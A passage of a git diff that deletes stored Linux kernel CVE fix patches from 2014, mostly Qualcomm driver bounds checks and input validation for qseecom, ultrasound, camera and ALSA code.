-+						(uint32_t)req.cmd_req_buf);
-+	req.resp_buf = (void *)__qseecom_uvirt_to_kvirt(data,
-+						(uint32_t)req.resp_buf);
-+
- 	ret = __qseecom_update_cmd_buf(&req, false, data, false);
- 	if (ret)
- 		return ret;
-@@ -1877,11 +1916,20 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
- {
- 	struct qseecom_send_modfd_listener_resp resp;
- 	int i;
-+	struct qseecom_registered_listener_list *this_lstnr = NULL;
- 
- 	if (copy_from_user(&resp, argp, sizeof(resp))) {
- 		pr_err("copy_from_user failed");
- 		return -EINVAL;
- 	}
-+	this_lstnr = __qseecom_find_svc(data->listener.id);
-+	if (this_lstnr == NULL)
-+		return -EINVAL;
-+
-+	if (resp.resp_buf_ptr == NULL) {
-+		pr_err("Invalid resp_buf_ptr\n");
-+		return -EINVAL;
-+	}
- 	/* validate offsets */
- 	for (i = 0; i < MAX_ION_FD; i++) {
- 		if (resp.ifd_data[i].cmd_buf_offset >= resp.resp_len) {
-@@ -1890,6 +1938,17 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
- 			return -EINVAL;
- 		}
- 	}
-+
-+	if (((uint32_t)resp.resp_buf_ptr <
-+			this_lstnr->user_virt_sb_base)
-+			|| ((uint32_t)resp.resp_buf_ptr >=
-+			(this_lstnr->user_virt_sb_base +
-+			this_lstnr->sb_length))) {
-+		pr_err("resp_buf_ptr address not within shared buffer\n");
-+		return -EINVAL;
-+	}
-+	resp.resp_buf_ptr = (uint32_t)this_lstnr->sb_virt +
-+		(resp.resp_buf_ptr - this_lstnr->user_virt_sb_base);
- 	__qseecom_update_cmd_buf(&resp, false, data, true);
- 	qseecom.send_resp_flag = 1;
- 	wake_up_interruptible(&qseecom.send_resp_wq);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9885/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9885/ANY/0001.patch
deleted file mode 100644
index ffcb5526..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9885/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From a1d5a4cbd5aa8656bc23b40c7cc43941e10f89c3 Mon Sep 17 00:00:00 2001
-From: Dipen Parmar <dipenp@codeaurora.org>
-Date: Fri, 18 Oct 2013 15:53:36 +0530
-Subject: thermal: qpnp-adc-tm: Fix format specifier in snprintf
-
-Add format specifier in snprintf to avoid security
-vulnerability issues.
-
-Change-Id: I6ea67633348341267e0646912a6b428709410c78
-Signed-off-by: Dipen Parmar <dipenp@codeaurora.org>
----
- drivers/thermal/qpnp-adc-tm.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/qpnp-adc-tm.c b/drivers/thermal/qpnp-adc-tm.c
-index a90a042..b203ae3 100644
---- a/drivers/thermal/qpnp-adc-tm.c
-+++ b/drivers/thermal/qpnp-adc-tm.c
-@@ -1886,7 +1886,7 @@ static int qpnp_adc_tm_probe(struct spmi_device *spmi)
- 			pr_debug("thermal node%x\n", btm_channel_num);
- 			chip->sensor[sen_idx].mode = THERMAL_DEVICE_DISABLED;
- 			chip->sensor[sen_idx].thermal_node = true;
--			snprintf(name, sizeof(name),
-+			snprintf(name, sizeof(name), "%s",
- 				chip->adc->adc_channels[sen_idx].name);
- 			chip->sensor[sen_idx].meas_interval =
- 				QPNP_ADC_TM_MEAS_INTERVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9886/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9886/ANY/0001.patch
deleted file mode 100644
index 15191d3a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9886/ANY/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 80be0e249c906704085d13d4ae446f73913fc225 Mon Sep 17 00:00:00 2001
-From: Baruch Eruchimovitch <baruche@codeaurora.org>
-Date: Mon, 14 Oct 2013 15:49:41 +0300
-Subject: msm: ultrasound: add verifications of some input parameters
-
-Some security vulnerabilities were found.
-To fix them, additional verifications of some input parameters
-are required.
-
-CRs-Fixed: 554575, 554560, 555030
-Change-Id: Ie87a433bcda89c3e462cfd511c168e8306056020
-Signed-off-by: Baruch Eruchimovitch <baruche@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c | 82 ++++++++++++++++++------------
- 1 file changed, 49 insertions(+), 33 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-index 1ea213a..01fcfd9 100644
---- a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-+++ b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-@@ -51,6 +51,11 @@
- #define Y_IND 1
- #define Z_IND 2
- 
-+/* Shared memory limits */
-+/* max_buf_size = (port_size(65535*2) * port_num(8) * group_size(3) */
-+#define USF_MAX_BUF_SIZE 3145680
-+#define USF_MAX_BUF_NUM  32
-+
- /* Place for opreation result, received from QDSP6 */
- #define APR_RESULT_IND 1
- 
-@@ -436,6 +441,15 @@ static int config_xx(struct usf_xx_type *usf_xx, struct us_xx_info_type *config)
- 	    (config == NULL))
- 		return -EINVAL;
- 
-+	if ((config->buf_size == 0) ||
-+	    (config->buf_size > USF_MAX_BUF_SIZE) ||
-+	    (config->buf_num == 0) ||
-+	    (config->buf_num > USF_MAX_BUF_NUM)) {
-+		pr_err("%s: wrong params: buf_size=%d; buf_num=%d\n",
-+		       __func__, config->buf_size, config->buf_num);
-+		return -EINVAL;
-+	}
-+
- 	data_map_size = sizeof(usf_xx->encdec_cfg.cfg_common.data_map);
- 	min_map_size = min(data_map_size, config->port_cnt);
- 
-@@ -748,6 +762,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- {
- 	uint32_t timeout = 0;
- 	struct us_detect_info_type detect_info;
-+	struct usm_session_cmd_detect_info *p_allocated_memory = NULL;
- 	struct usm_session_cmd_detect_info usm_detect_info;
- 	struct usm_session_cmd_detect_info *p_usm_detect_info =
- 						&usm_detect_info;
-@@ -774,12 +789,13 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 		uint8_t *p_data = NULL;
- 
- 		detect_info_size += detect_info.params_data_size;
--		p_usm_detect_info = kzalloc(detect_info_size, GFP_KERNEL);
--		if (p_usm_detect_info == NULL) {
-+		 p_allocated_memory = kzalloc(detect_info_size, GFP_KERNEL);
-+		if (p_allocated_memory == NULL) {
- 			pr_err("%s: detect_info[%d] allocation failed\n",
- 			       __func__, detect_info_size);
- 			return -ENOMEM;
- 		}
-+		p_usm_detect_info = p_allocated_memory;
- 		p_data = (uint8_t *)p_usm_detect_info +
- 			sizeof(struct usm_session_cmd_detect_info);
- 
-@@ -789,7 +805,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 		if (rc) {
- 			pr_err("%s: copy params from user; rc=%d\n",
- 				__func__, rc);
--			kfree(p_usm_detect_info);
-+			kfree(p_allocated_memory);
- 			return -EFAULT;
- 		}
- 		p_usm_detect_info->algorithm_cfg_size =
-@@ -806,9 +822,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 				    p_usm_detect_info,
- 				    detect_info_size);
- 	if (rc || (detect_info.detect_timeout == USF_NO_WAIT_TIMEOUT)) {
--		if (detect_info_size >
--		    sizeof(struct usm_session_cmd_detect_info))
--			kfree(p_usm_detect_info);
-+		kfree(p_allocated_memory);
- 		return rc;
- 	}
- 
-@@ -828,25 +842,24 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 					 USF_US_DETECT_UNDEF),
- 					timeout);
- 	/* In the case of timeout, "no US" is assumed */
--	if (rc < 0) {
-+	if (rc < 0)
- 		pr_err("%s: Getting US detection failed rc[%d]\n",
- 		       __func__, rc);
--		return rc;
--	}
--
--	usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
--	detect_info.is_us = (usf_xx->us_detect_type == USF_US_DETECT_YES);
--	rc = copy_to_user((void __user *)arg,
--			  &detect_info,
--			  sizeof(detect_info));
--	if (rc) {
--		pr_err("%s: copy detect_info to user; rc=%d\n",
--			__func__, rc);
--		rc = -EFAULT;
-+	else {
-+		usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
-+		detect_info.is_us =
-+			(usf_xx->us_detect_type == USF_US_DETECT_YES);
-+		rc = copy_to_user((void __user *)arg,
-+				  &detect_info,
-+				  sizeof(detect_info));
-+		if (rc) {
-+			pr_err("%s: copy detect_info to user; rc=%d\n",
-+				__func__, rc);
-+			rc = -EFAULT;
-+		}
- 	}
- 
--	if (detect_info_size > sizeof(struct usm_session_cmd_detect_info))
--		kfree(p_usm_detect_info);
-+	kfree(p_allocated_memory);
- 
- 	return rc;
- } /* usf_set_us_detection */
-@@ -947,16 +960,14 @@ static int usf_set_rx_info(struct usf_type *usf, unsigned long arg)
- 	if (rc)
- 		return rc;
- 
--	if (usf_xx->buffer_size && usf_xx->buffer_count) {
--		rc = q6usm_us_client_buf_alloc(
--					IN,
--					usf_xx->usc,
--					usf_xx->buffer_size,
--					usf_xx->buffer_count);
--		if (rc) {
--			(void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
--			return rc;
--		}
-+	rc = q6usm_us_client_buf_alloc(
-+				IN,
-+				usf_xx->usc,
-+				usf_xx->buffer_size,
-+				usf_xx->buffer_count);
-+	if (rc) {
-+		(void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
-+		return rc;
- 	}
- 
- 	rc = q6usm_dec_cfg_blk(usf_xx->usc,
-@@ -1175,10 +1186,15 @@ static int usf_get_version(unsigned long arg)
- 		return -EFAULT;
- 	}
- 
--	/* version_info.buf is pointer to place for the version string */
-+	if (version_info.buf_size < sizeof(DRV_VERSION)) {
-+		pr_err("%s: buf_size (%d) < version string size (%d)\n",
-+			__func__, version_info.buf_size, sizeof(DRV_VERSION));
-+		return -EINVAL;
-+	}
-+
- 	rc = copy_to_user(version_info.pbuf,
- 			  DRV_VERSION,
--			  version_info.buf_size);
-+			  sizeof(DRV_VERSION));
- 	if (rc) {
- 		pr_err("%s: copy to version_info.pbuf; rc=%d\n",
- 			__func__, rc);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9887/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9887/ANY/0001.patch
deleted file mode 100644
index 76fc99b4..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9887/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From b1bc773cf61265e0e3871b2e52bd6b3270ffc6c3 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Thu, 27 Mar 2014 12:44:15 -0700
-Subject: qseecom: Validate pointer offset in qseecom_send_modfd_cmd
-
-Validate cmd_req_buf pointer offset in qseecom_send_modfy_cmd, and
-make sure cmd buffer address to be within shared bufffer.
-
-Change-Id: I431511a92ab2cccbc2daebc0cf76cc3872689a97
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 5d2b64c..bce4994 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1635,6 +1635,13 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- 		pr_err("response buffer address not within shared bufffer\n");
- 		return -EINVAL;
- 	}
-+
-+	if (req.cmd_req_len == 0 || req.cmd_req_len > data->client.sb_length ||
-+		req.resp_len > data->client.sb_length) {
-+		pr_err("cmd or response buffer length not valid\n");
-+		return -EINVAL;
-+	}
-+
- 	send_cmd_req.cmd_req_buf = req.cmd_req_buf;
- 	send_cmd_req.cmd_req_len = req.cmd_req_len;
- 	send_cmd_req.resp_buf = req.resp_buf;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9888/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9888/ANY/0001.patch
deleted file mode 100644
index 47a0698c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9888/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From f044936caab337a4384fbfe64a4cbae33c7e22a1 Mon Sep 17 00:00:00 2001
-From: Russell King <rmk+kernel@arm.linux.org.uk>
-Date: Wed, 23 Oct 2013 16:14:59 +0100
-Subject: ARM: dma-mapping: don't allow DMA mappings to be marked executable
-
-DMA mapping permissions were being derived from pgprot_kernel directly
-without using PAGE_KERNEL.  This causes them to be marked with executable
-permission, which is not what we want.  Fix this.
-
-Change-Id: Ib40f59f3c569f82409943cf8f9a86a9869d922cc
-Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
-Git-commit: 0ea1ec713f04bdfac343c9702b21cd3a7c711826
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-[lauraa@codeaurora.org: dropped functions not in older builds]
-Signed-off-by: Laura Abbott <lauraa@codeaurora.org>
----
- arch/arm/mm/dma-mapping.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mm/dma-mapping.c b/arch/arm/mm/dma-mapping.c
-index 230dfe0ef..935bb9a 100644
---- a/arch/arm/mm/dma-mapping.c
-+++ b/arch/arm/mm/dma-mapping.c
-@@ -657,7 +657,7 @@ static void *__dma_alloc(struct device *dev, size_t size, dma_addr_t *handle,
- void *arm_dma_alloc(struct device *dev, size_t size, dma_addr_t *handle,
- 		    gfp_t gfp, struct dma_attrs *attrs)
- {
--	pgprot_t prot = __get_dma_pgprot(attrs, pgprot_kernel);
-+	pgprot_t prot = __get_dma_pgprot(attrs, PAGE_KERNEL);
- 	void *memory;
- 	bool no_kernel_mapping = dma_get_attr(DMA_ATTR_NO_KERNEL_MAPPING,
- 					attrs);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9889/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9889/ANY/0001.patch
deleted file mode 100644
index cf130879..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9889/ANY/0001.patch
+++ /dev/null
@@ -1,155 +0,0 @@
-From f4e2f2d4ef58c88340774099dff3324ec8baa24a Mon Sep 17 00:00:00 2001
-From: Manish Poddar <mpoddar@codeaurora.org>
-Date: Thu, 10 Jul 2014 19:43:31 +0530
-Subject: msm: cpp: Validate frame message before manipulating it
-
-CPP frame message is used to send all frame data
-to Microcontroller. It is sent every frame. CPP kernel
-driver has to add information to it before transfer it.
-The message has to be validated before manipulations.
-If it is not valid the message and corresponding frame
-are discarded.
-Change-Id: Ib5b9b5d2e1886d3d671966b693ce212d58e34041
-Signed-off-by: Manish Poddar <mpoddar@codeaurora.org>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 61 +++++++++++++++++-----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.h     |  1 +
- include/media/msmb_pproc.h                         |  3 +-
- 3 files changed, 50 insertions(+), 15 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index d3a848a..253cbed 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -56,6 +56,16 @@
- #define MSM_CPP_NOMINAL_CLOCK 266670000
- #define MSM_CPP_TURBO_CLOCK 320000000
- 
-+#define CPP_FW_VERSION_1_2_0	0x10020000
-+#define CPP_FW_VERSION_1_4_0	0x10040000
-+#define CPP_FW_VERSION_1_6_0	0x10060000
-+#define CPP_FW_VERSION_1_8_0	0x10080000
-+
-+/* stripe information offsets in frame command */
-+#define STRIPE_BASE_FW_1_2_0	130
-+#define STRIPE_BASE_FW_1_4_0	140
-+#define STRIPE_BASE_FW_1_6_0	464
-+
- struct msm_cpp_timer_data_t {
- 	struct cpp_device *cpp_dev;
- 	struct msm_cpp_frame_info_t *processed_frame;
-@@ -918,7 +928,8 @@ static void cpp_load_fw(struct cpp_device *cpp_dev, char *fw_name_bin)
- 	msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_CMD);
- 	msm_cpp_poll(cpp_dev->base, 0x2);
- 	msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_FW_VER);
--	pr_info("CPP FW Version: 0x%x\n", msm_cpp_read(cpp_dev->base));
-+	cpp_dev->fw_version = msm_cpp_read(cpp_dev->base);
-+	pr_info("CPP FW Version: 0x%08x\n", cpp_dev->fw_version);
- 	msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_TRAILER);
- 
- 	/*Disable MC clock*/
-@@ -1287,9 +1298,8 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- 	struct msm_cpp_frame_info_t *u_frame_info =
- 		(struct msm_cpp_frame_info_t *)ioctl_ptr->ioctl_ptr;
- 	int32_t status = 0;
--	uint8_t fw_version_1_2_x = 0;
- 	int in_fd;
--
-+	int32_t stripe_base = 0;
- 	int i = 0;
- 	if (!new_frame) {
- 		pr_err("Insufficient memory. return\n");
-@@ -1330,7 +1340,16 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- 	}
- 
- 	new_frame->cpp_cmd_msg = cpp_frame_msg;
--
-+	if (cpp_frame_msg == NULL ||
-+		(new_frame->msg_len < MSM_CPP_MIN_FRAME_LENGTH)) {
-+		pr_err("%s %d Length is not correct or frame message is missing\n",
-+			__func__, __LINE__);
-+		return -EINVAL;
-+	}
-+	if (cpp_frame_msg[new_frame->msg_len - 1] != MSM_CPP_MSG_ID_TRAILER) {
-+		pr_err("%s %d Invalid frame message\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
- 	in_phyaddr = msm_cpp_fetch_buffer_info(cpp_dev,
- 		&new_frame->input_buffer_info,
- 		((new_frame->input_buffer_info.identity >> 16) & 0xFFFF),
-@@ -1404,22 +1423,36 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- 		((cpp_frame_msg[12] >> 10) & 0x3FF) +
- 		(cpp_frame_msg[12] & 0x3FF);
- 
--	fw_version_1_2_x = 0;
--	if ((cpp_dev->hw_info.cpp_hw_version == CPP_HW_VERSION_1_1_0) ||
--		(cpp_dev->hw_info.cpp_hw_version == CPP_HW_VERSION_1_1_1) ||
--		(cpp_dev->hw_info.cpp_hw_version == CPP_HW_VERSION_2_0_0))
--		fw_version_1_2_x = 2;
-+	if ((cpp_dev->fw_version & 0xffff0000) ==
-+		CPP_FW_VERSION_1_2_0) {
-+		stripe_base = STRIPE_BASE_FW_1_2_0;
-+	} else if ((cpp_dev->fw_version & 0xffff0000) ==
-+		CPP_FW_VERSION_1_4_0) {
-+		stripe_base = STRIPE_BASE_FW_1_4_0;
-+	} else if ((cpp_dev->fw_version & 0xffff0000) ==
-+		CPP_FW_VERSION_1_6_0) {
-+		stripe_base = STRIPE_BASE_FW_1_6_0;
-+	} else {
-+		pr_err("invalid fw version %08x", cpp_dev->fw_version);
-+	}
-+
-+	if ((stripe_base + num_stripes*27 + 1) != new_frame->msg_len) {
-+		pr_err("Invalid frame message\n");
-+		rc = -EINVAL;
-+		goto ERROR3;
-+	}
-+
- 
- 	for (i = 0; i < num_stripes; i++) {
--		cpp_frame_msg[(133 + fw_version_1_2_x) + i * 27] +=
-+		cpp_frame_msg[stripe_base + 5 + i*27] +=
- 			(uint32_t) in_phyaddr;
--		cpp_frame_msg[(139 + fw_version_1_2_x) + i * 27] +=
-+		cpp_frame_msg[stripe_base + 11 + i * 27] +=
- 			(uint32_t) out_phyaddr0;
--		cpp_frame_msg[(140 + fw_version_1_2_x) + i * 27] +=
-+		cpp_frame_msg[stripe_base + 12 + i * 27] +=
- 			(uint32_t) out_phyaddr1;
--		cpp_frame_msg[(141 + fw_version_1_2_x) + i * 27] +=
-+		cpp_frame_msg[stripe_base + 13 + i * 27] +=
- 			(uint32_t) out_phyaddr0;
--		cpp_frame_msg[(142 + fw_version_1_2_x) + i * 27] +=
-+		cpp_frame_msg[stripe_base + 14 + i * 27] +=
- 			(uint32_t) out_phyaddr1;
- 	}
- 
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h
-index bd73ab2..af1af2d 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h
-@@ -189,6 +189,7 @@ struct cpp_device {
- 	char *fw_name_bin;
- 	struct workqueue_struct *timer_wq;
- 	struct msm_cpp_work_t *work;
-+	uint32_t fw_version;
- 	uint8_t stream_cnt;
- 	uint8_t timeout_trial_cnt;
- 
-diff --git a/include/media/msmb_pproc.h b/include/media/msmb_pproc.h
-index 59dcca9..f5a53a8 100644
---- a/include/media/msmb_pproc.h
-+++ b/include/media/msmb_pproc.h
-@@ -13,7 +13,8 @@
- 
- #define MAX_NUM_CPP_STRIPS 8
- #define MSM_CPP_MAX_NUM_PLANES 3
--#define MSM_CPP_MAX_FRAME_LENGTH 1024
-+#define MSM_CPP_MIN_FRAME_LENGTH 13
-+#define MSM_CPP_MAX_FRAME_LENGTH 2048
- #define MSM_CPP_MAX_FW_NAME_LEN 32
- #define MAX_FREQ_TBL 10
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9890/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9890/ANY/0001.patch
deleted file mode 100644
index 5be0e2d8..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9890/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 14e0c8614d2715589583d8a95e33c422d110eb6f Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 25 Jun 2013 17:45:23 -0700
-Subject: msm: camera: Update CCI WR comamnd buffer size to 11 bytes
-
-I2C command length is of 11 bytes, it includes 10 bytes of data and
-1 byte of WR command. Use 11 bytes char array to create command.
-
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
-Change-Id: I5292f238d612810a514b6a8bba9e70e07eb2627f
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 61873d3..ddc3b57 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -181,7 +181,7 @@ static int32_t msm_cci_data_queue(struct cci_device *cci_dev,
- 	uint16_t i = 0, j = 0, k = 0, h = 0, len = 0;
- 	int32_t rc = 0;
- 	uint32_t cmd = 0, delay = 0;
--	uint8_t data[10];
-+	uint8_t data[11];
- 	uint16_t reg_addr = 0;
- 	struct msm_camera_i2c_reg_setting *i2c_msg =
- 		&c_ctrl->cfg.cci_i2c_write_cfg;
-@@ -616,7 +616,7 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- 		msm_cci_flush_queue(cci_dev, master);
- 		goto ERROR;
- 	} else {
--		rc = 0;
-+		rc = cci_dev->cci_master_info[master].status;
- 	}
- 	CDBG("%s:%d X wait_for_completion_interruptible\n", __func__,
- 		__LINE__);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9891/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9891/ANY/0001.patch
deleted file mode 100644
index cd8b5d65..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9891/ANY/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From c10f03f191307f7114af89933f2d91b830150094 Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
-Date: Fri, 27 Sep 2013 18:38:53 -0700
-Subject: qseecom: Copy userspace buffer into kernel space before dereferencing
-
-ION memory is used for user space to kernel space data passing.
-This is directly accessible in kernel. But, if the IOCTL is called
-from user space without using User space library, then data might
-be pointing to some other memory location, in which case, it would
-not be possible to dereference this location in kernel & hence it
-would be accessing invalid memory.
-
-Change-Id: Ic50c76ee8b2a696dbb786fce3a68cdc782e15268
-Signed-off-by: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
----
- drivers/misc/qseecom.c | 25 ++++++++++++++++++++++++-
- 1 file changed, 24 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 4c1943b..1c93bf4 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1006,14 +1006,37 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 		struct qseecom_client_send_service_ireq *send_svc_ireq_ptr)
- {
- 	int ret = 0;
-+	void *req_buf = NULL;
-+
- 	if ((req_ptr == NULL) || (send_svc_ireq_ptr == NULL)) {
- 		pr_err("Error with pointer: req_ptr = %p, send_svc_ptr = %p\n",
- 			req_ptr, send_svc_ireq_ptr);
- 		return -EINVAL;
- 	}
-+
-+	if (((uint32_t)req_ptr->cmd_req_buf <
-+			data_ptr->client.user_virt_sb_base)
-+			|| ((uint32_t)req_ptr->cmd_req_buf >=
-+			(data_ptr->client.user_virt_sb_base +
-+			data_ptr->client.sb_length))) {
-+		pr_err("cmd buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
-+
-+
-+	if (((uint32_t)req_ptr->resp_buf < data_ptr->client.user_virt_sb_base)
-+			|| ((uint32_t)req_ptr->resp_buf >=
-+			(data_ptr->client.user_virt_sb_base +
-+			data_ptr->client.sb_length))){
-+		pr_err("response buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
-+
-+	req_buf = data_ptr->client.sb_virt;
-+
- 	send_svc_ireq_ptr->qsee_cmd_id = req_ptr->cmd_id;
- 	send_svc_ireq_ptr->key_type =
--	((struct qseecom_rpmb_provision_key *)req_ptr->cmd_req_buf)->key_type;
-+		((struct qseecom_rpmb_provision_key *)req_buf)->key_type;
- 	send_svc_ireq_ptr->req_len = req_ptr->cmd_req_len;
- 	send_svc_ireq_ptr->rsp_ptr = (void *)(__qseecom_uvirt_to_kphys(data_ptr,
- 					(uint32_t)req_ptr->resp_buf));
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9892/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9892/ANY/0001.patch
deleted file mode 100644
index 8da8a684..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9892/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 591b1f455c32206704cbcf426bb30911c260c33e Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly <kkolat@codeaurora.org>
-Date: Wed, 6 Nov 2013 10:08:39 -0800
-Subject: ALSA: compress: Memset timestamp structure to zero.
-
-snd_compr_tstamp is initialized using aggregate initialization
-that does not zero out the padded bytes. Initialize timestamp
-structure to zero using memset to avoid this.
-
-CRs-Fixed: 568717
-Change-Id: I7a7d188705161f06201f1a1f2945bb6acd633d5d
-Signed-off-by: Krishnankutty Kolathappilly <kkolat@codeaurora.org>
----
- sound/core/compress_offload.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index 99db892..0a69437 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -613,9 +613,10 @@ snd_compr_set_metadata(struct snd_compr_stream *stream, unsigned long arg)
- static inline int
- snd_compr_tstamp(struct snd_compr_stream *stream, unsigned long arg)
- {
--	struct snd_compr_tstamp tstamp = {0};
-+	struct snd_compr_tstamp tstamp;
- 	int ret;
- 
-+	memset(&tstamp, 0, sizeof(tstamp));
- 	ret = snd_compr_update_tstamp(stream, &tstamp);
- 	if (ret == 0)
- 		ret = copy_to_user((struct snd_compr_tstamp __user *)arg,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9893/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9893/ANY/0001.patch
deleted file mode 100644
index 912d44a7..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9893/ANY/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From bfc6eee5e30a0c20bc37495233506f4f0cc4991d Mon Sep 17 00:00:00 2001
-From: Ping Li <quicpingli@codeaurora.org>
-Date: Thu, 3 Oct 2013 20:01:52 -0400
-Subject: msm: mdss: Replace the size check for gamut LUTs
-
-Add more reliable size check for gamut LUTs to prevent potential
-security issues such as information leak.
-
-Change-Id: I32be41a2612a100b9ba6167737c2f8778f720fa2
-Signed-off-by: Ping Li <quicpingli@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_mdp_pp.c | 33 +++++++++++++++++++++++++++++----
- 1 file changed, 29 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index ed95030..1d8430e 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -295,6 +295,10 @@ static void pp_update_argc_lut(char __iomem *addr,
- 				struct mdp_pgc_lut_data *config);
- static void pp_update_hist_lut(char __iomem *base,
